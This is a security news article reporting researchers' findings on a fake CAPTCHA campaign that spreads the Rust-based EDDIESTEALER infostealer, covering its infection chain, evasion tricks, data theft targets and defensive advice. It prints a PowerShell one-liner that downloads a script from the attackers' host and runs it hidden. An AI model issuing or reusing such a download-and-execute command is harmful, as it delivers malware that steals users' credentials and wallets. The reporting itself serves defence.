Hackers Distribute Fake CAPTCHA Campaigns that Trick User to  Install Rust- Based InfoStealer

Cybersecurity researchers at Elastic Security Labs have uncovered a sophisticated campaign leveraging fake CAPTCHA verification pages to disseminate a sophisticated, Rust-based infostealer known as EDDIESTEALER.

This novel malware showcases the continued professionalization and technical evolution among cybercriminals, exploiting user trust in familiar verification systems to facilitate the stealthy installation and operation of an advanced data exfiltration tool.

The Attack Chain: Social Engineering Meets Technical Sophistication

The infection begins when unsuspecting users encounter a fake CAPTCHA, often embedded in compromised or malicious web pages.

Styled to closely mimic Google’s reCAPTCHA (e.g., “I’m not a robot”), the page employs a social engineering sequence:

1. Obfuscated React-based JavaScript presents a counterfeit CAPTCHA.
2. Upon interaction, the script silently copies a malicious PowerShell command to the user’s clipboard.
3. Users are then instructed to run this command via Windows+R and paste, unknowingly triggering the download of a second-stage payload (gverify.js) from attacker infrastructure.

PowerShell one-liner (simplified):

powershellpowershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://llll.fit/version/' -OutFile $env:USERPROFILE\Downloads\gverify.js; cscript //B $env:USERPROFILE\Downloads\gverify.js"

gverify.js itself is an obfuscated script that fetches and executes the main Rust-based infostealer , dropped to the Downloads folder with a pseudorandom filename.

Rust as the Language of Choice

Rust’s increasing popularity among malware developers is evident with EDDIESTEALER.

Its memory safety, efficient abstractions, and difficult-to-analyze binaries (due to aggressive optimization and inlining) frustrate traditional detection and reverse engineering.

Most critical strings are encrypted via a simple XOR cipher, with decryption performed just-in-time within the relevant function. Each decryption routine uses distinct key derivation logic, complicating bulk static analysis.

Example string decryption pseudo-code:

rustfn decrypt_string(addr: u64, key: u32) -> String {
    let xor_key = derive_key(addr, key);
    (encrypted_blob ^ xor_key).to_string()
}

APIs are dynamically resolved as needed. EDDIESTEALER decrypts target DLL and function names, checks an internal cache, and, if necessary, dynamically loads modules and retrieves function pointers obfuscating the malware’s import table and frustrating static signature based detection.

Mutex, Sandbox, and Self-Destruct Features

• Mutex Creation: On execution, EDDIESTEALER creates a mutex using a decrypted UUID to ensure only one instance runs.
• Weak Sandbox Evasion: It checks system RAM; systems with below ~4GB are assumed to be sandboxes or VMs, prompting self-deletion.
• Self-Deletion: Employs NTFS Alternate Data Stream renaming, a file-lock bypass technique, to securely remove itself from disk post-execution.

Command & Control (C2) and Data Exfiltration

Upon startup, EDDIESTEALER contacts its C2, constructing a unique URL using decrypted configuration data. The C2 returns a task list (JSON, AES-encrypted), specifying which files and data types to target:

Targeted Data (Examples):

• Crypto Wallets: Electrum, Exodus, Daedalus, Atomic, etc.
• Browsers: Chrome, Edge, Brave, Firefox (history, passwords, cookies).
• Password Managers: Bitwarden, 1Password, KeePass.
• FTP Clients, Messaging Apps

Exfiltration is performed via plaintext HTTP POST requests (distinct per task), each containing AES-encrypted payloads.

Sample JSON config structure:

json{
  "session": "unique_session_id",
  "tasks": [
    {
      "id": "task_id",
      "pattern": {"path": "<target_path>", "filters": [ ... ]}
    }
  ],
  "network": {"encryption_key": "<AES_key>"},
  "self_delete": true
}

EDDIESTEALER uses re-implemented techniques from open-source projects like ChromeKatz to extract browser credentials, including by leveraging Chrome’s DevTools Protocol and memory scanning even spawning off-screen browsers to load credentials into memory for exfiltration.

A Defensive Recommendations

• User Awareness: Train users about fake CAPTCHAs especially those that prompt “copy and run” commands.
• Defense-in-Depth: Block PowerShell script execution where not needed; monitor process chains launching scripts from browsers.
• Network: Watch for suspicious outbound HTTP (not HTTPS) traffic, especially POST requests containing encrypted blobs to unfamiliar endpoints.
• Incident Response: Forensic recovery must include memory and process monitoring to catch malware employing self-deletion.

Indicators of Compromise